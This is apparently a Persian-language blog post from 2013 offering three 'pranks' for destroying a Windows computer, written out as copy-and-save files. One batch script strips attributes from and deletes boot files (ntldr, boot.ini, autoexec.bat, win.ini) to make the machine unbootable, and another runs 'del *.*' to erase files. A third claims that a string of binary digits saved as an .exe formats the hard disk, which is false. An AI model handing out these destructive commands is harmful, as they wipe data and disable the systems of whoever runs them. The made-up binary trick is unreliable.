1. خاموش كردن كامپیوتر برای همیشه 

كد زیر رو درون یك فایل Notepad كپی كنید. 

كد php: @echo off 
attrib -r -s -h c:\autoexec.bat 
del c:\autoexec.bat 
attrib -r -s -h c:\boot.ini 
del c:\boot.ini 
attrib -r -s -h c:\ntldr 
del c:\ntldr 
attrib -r -s -h c:\windows\win.ini 
del c:\windows\win.ini 

و بعد آن را با نام whatever.bat ذخیره كنید. 

2. فرمت كردن هارد دیسك 

كد زیر رو درون یك فایل Notepad كپی كنید. كد php: code:01001011000111110010010101010101010000011111100000 

و بعد آن را با نام whatever.exe ذخیره كنید. 

3. حذف تمام فایل های سیستم 

كد زیر رو درون یك فایل Notepad كپی كنید. كد php: del *.* 

و بعد آن را با نام anything.bat ذخیره كنید. 

پنجشنبه 27 تیر 1392
بؤلوملر : different,